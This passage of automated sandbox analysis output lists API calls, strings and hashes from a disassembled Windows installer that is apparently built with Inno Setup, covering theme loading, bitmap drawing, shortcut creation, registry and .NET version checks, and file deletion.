                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                        • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                        • API String ID: 1968650500-2910565190
                                                                                                                                        • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                                                        • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                                                                        • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                                                        • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0041CA40
                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                                                                        • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                                                                        • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                                                                        • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                                                                        • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                                                                        • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                                                                        • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                                                                        • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                                                                        • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                                                                        • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                                                                        • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                                                                        • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                                                                          • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 269503290-0
                                                                                                                                        • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                                                        • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                                                                        • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                                                        • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                                                                        • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                                                                        Strings
                                                                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                                                                        • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                                                                        • {pf32}\, xrefs: 0045671E
                                                                                                                                        • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                                                                        • CoCreateInstance, xrefs: 004566AF
                                                                                                                                        • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                                                                        • IPersistFile::Save, xrefs: 00456962
                                                                                                                                        • IPropertyStore::Commit, xrefs: 004568E3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInstance$FreeString
                                                                                                                                        • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                                                                        • API String ID: 308859552-2363233914
                                                                                                                                        • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                                                        • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                                                                        • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                                                        • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                                                                        • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                                                                        • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                                                                          • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                                                        • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                                                        • API String ID: 2000705611-3672972446
                                                                                                                                        • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                                                        • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                                                                        • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                                                        • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                                                        • API String ID: 1452528299-3112430753
                                                                                                                                        • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                                                                        • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                                                                        • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                                                                        • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                                                                          • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                                                        • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                                                        • API String ID: 59345061-4263478283
                                                                                                                                        • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                                                        • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                                                                        • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                                                        • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                                                                        APIs
                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                                                                        • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                                                                        • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                                                                        • GetDC.USER32(00000000), ref: 0041B402
                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                                                        • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 644427674-0
                                                                                                                                        • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                                                        • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                                                                        • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                                                        • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                                                                        • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                                                                        • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                                                                        • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                                                        • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                                                        • API String ID: 971782779-3668018701
                                                                                                                                        • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                                                        • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                                                                        • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                                                        • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                                                                          • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                                                                        Strings
                                                                                                                                        • , xrefs: 004548FE
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                                                                        • RegOpenKeyEx, xrefs: 00454910
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue$FormatMessageOpen
                                                                                                                                        • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                        • API String ID: 2812809588-1577016196
                                                                                                                                        • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                                                        • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                                                                        • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                                                        • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                                                                        Strings
                                                                                                                                        • v2.0.50727, xrefs: 0045955B
                                                                                                                                        • v1.1.4322, xrefs: 004595C2
                                                                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                                                                        • .NET Framework version %s not found, xrefs: 00459609
                                                                                                                                        • .NET Framework not found, xrefs: 0045961D
                                                                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                                                                        • v4.0.30319, xrefs: 004594F1
                                                                                                                                        • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$Open
                                                                                                                                        • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                                                        • API String ID: 2976201327-446240816
                                                                                                                                        • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                                                        • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                                                                        • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                                                        • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                                                                        • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                                                                        • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                                                                        Strings
                                                                                                                                        • Helper process exited, but failed to get exit code., xrefs: 00458AEF
